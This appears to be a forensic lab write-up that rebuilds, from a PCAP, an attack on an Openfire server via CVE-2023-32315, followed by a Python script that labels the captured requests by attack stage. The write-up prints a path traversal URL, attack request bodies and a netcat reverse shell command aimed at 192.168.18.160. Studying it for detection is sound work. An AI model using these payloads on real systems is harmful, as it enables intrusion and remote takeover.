TechNova Corp runs an Openfire-powered internal messaging server. The ShadowHunters threat group exploited a critical path traversal vulnerability in the Openfire admin console (CVE-2023-32315), gaining unauthenticated access to the admin panel, creating rogue accounts, uploading a malicious plugin for remote code execution, and ultimately establishing a reverse shell. The task is to analyse the provided PCAP in Wireshark and reconstruct the full attack chain.
CVE-2023-32315 is a path traversal vulnerability in the Openfire administration console that allows an unauthenticated attacker to access restricted pages by manipulating the URL path. The attacker used this to reach the admin login panel without valid credentials and begin their operation.
Filtering HTTP traffic in Wireshark and following the TCP streams reveals the full attack chain in order.
The first captured request is a POST to the Openfire admin login endpoint. Inspecting the form data in Wireshark shows the CSRF token submitted with the login:
```text
Form item: "csrf" = "VypyY6v0F1w8iNK"
```
The credentials used were admin:adminnothere. The CSRF token is required by the Openfire admin panel to prevent cross-site request forgery — the attacker extracted it from the login page before submitting the form.

With admin access established, the attacker created two new user accounts to maintain persistence in case the original access was revoked:
- ix5768 — first account created
- v01zxk — second account created

These are visible in Wireshark as POST requests to the Openfire user management endpoint, with the usernames visible in the form data.

The attacker then logged back in using v01zxk to continue operations — likely to avoid leaving traces on the original admin account session.
The most critical step in the chain is the upload of a malicious Openfire plugin. Openfire supports JAR-based plugins that extend server functionality — the attacker abused this legitimate feature to deploy a remote management tool.
Wireshark captures the multipart form upload with the filename clearly visible:
```text
form-data; name="uploadfile"; filename="openfire-management-tool-plugin.jar"
```

The malicious JAR plugin maps to T1204.002 (User Execution: Malicious File) — once uploaded, the Openfire server loads and executes the JAR directly, treating it as a legitimate plugin while it silently provides the attacker with remote code execution capability.
With the plugin active, the attacker used it to execute commands on the server. The first command sent was:
```shell
whoami
```
This is standard post-exploitation recon to confirm the execution context and identify what user the Openfire service is running as.

Satisfied with RCE confirmation, the attacker established a persistent reverse shell using Netcat, connecting back to their machine at 192[.]168[.]18[.]160 on port 8888:
```shell
nc 192.168.18.160 8888 -e /bin/bash
```
The `-e /bin/bash` flag binds a bash shell to the connection, giving the attacker a fully interactive shell session on the Openfire server.
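As an added example (not part of the original write-up and not taken from the real PCAP), the script below reconstructs the same chain from raw HTTP requests once they have been exported from Wireshark: it decodes the `%u002e` traversal encoding that plain percent-decoding misses, then tags each request as traversal, admin login, account creation, plugin upload, command or reverse shell. The sample requests are constructed to mirror the write-up; the host name, the `user-create.jsp` and `plugin-admin.jsp` endpoints and the `cmd` field are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed requests mirroring the writeup's chain; not from the real PCAP. Host, user-create.jsp, plugin-admin.jsp and "cmd" are assumptions.
HOST = "Host: openfire.technova.example:9090\r\n"
FORM = "Content-Type: application/x-www-form-urlencoded\r\n"
SAMPLE_REQUESTS = [
    "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\r\n" + HOST + "\r\n",
    "POST /login.jsp HTTP/1.1\r\n" + HOST + FORM + "\r\n"
    "csrf=VypyY6v0F1w8iNK&username=admin&password=adminnothere&login=Login",
    "POST /user-create.jsp HTTP/1.1\r\n" + HOST + FORM + "\r\n"
    "csrf=VypyY6v0F1w8iNK&username=ix5768&password=x&passwordConfirm=x",
    "POST /plugin-admin.jsp?uploadplugin HTTP/1.1\r\n" + HOST + "Content-Type: multipart/form-data; "
    'boundary=XX\r\n\r\n--XX\r\nContent-Disposition: form-data; name="uploadfile"; '
    'filename="openfire-management-tool-plugin.jar"\r\n\r\nPK\r\n--XX--',
    "POST /plugins/openfire-management-tool-plugin/ HTTP/1.1\r\n" + HOST + FORM + "\r\ncmd=whoami",
    "POST /plugins/openfire-management-tool-plugin/ HTTP/1.1\r\n" + HOST + FORM
    + "\r\ncmd=nc+192.168.18.160+8888+-e+%2Fbin%2Fbash",
]

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {k.lower(): v for k, v in (l.split(": ", 1) for l in lines[1:])}
    return method, target, headers, body

def normalize_path(target):
    # Fold the non-standard %u002e encoding to "." before percent-decoding, so the dot-segments become visible.
    return unquote(re.sub(r"%u002e", ".", target.split("?")[0], flags=re.I))

def classify(raw):
    method, target, headers, body = parse_request(raw)
    path, form = normalize_path(target), dict(parse_qsl(body))
    if ".." in path: return ("path-traversal", target)
    if method == "POST" and path.endswith("login.jsp"):
        return ("admin-login", f"user={form.get('username')} csrf={form.get('csrf')}")
    if method == "POST" and path.endswith("user-create.jsp"):
        return ("account-created", form.get("username"))
    if headers.get("content-type", "").startswith("multipart/form-data"):
        jar = re.search(r'filename="([^"]+\.jar)"', body)
        if jar: return ("plugin-upload", jar.group(1))
    cmd = form.get("cmd")
    if cmd:
        shell = re.match(r"nc\s+(\S+)\s+(\d+)\s+-e\s+\S+", cmd)
        return ("reverse-shell", f"{shell[1]}:{shell[2]}") if shell else ("command", cmd)
    return ("other", target)

def reconstruct_chain(requests):
    return [classify(r) for r in requests]  # (stage, detail) pairs in capture order
```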

| Type | Value |
|---|---|
| CVE | CVE-2023-32315 |
| IP | 192[.]168[.]18[.]160 |
| Port | 8888 |
| File | openfire-management-tool-plugin.jar |
| Username | ix5768 |
| Username | v01zxk |
| CSRF Token | VypyY6v0F1w8iNK |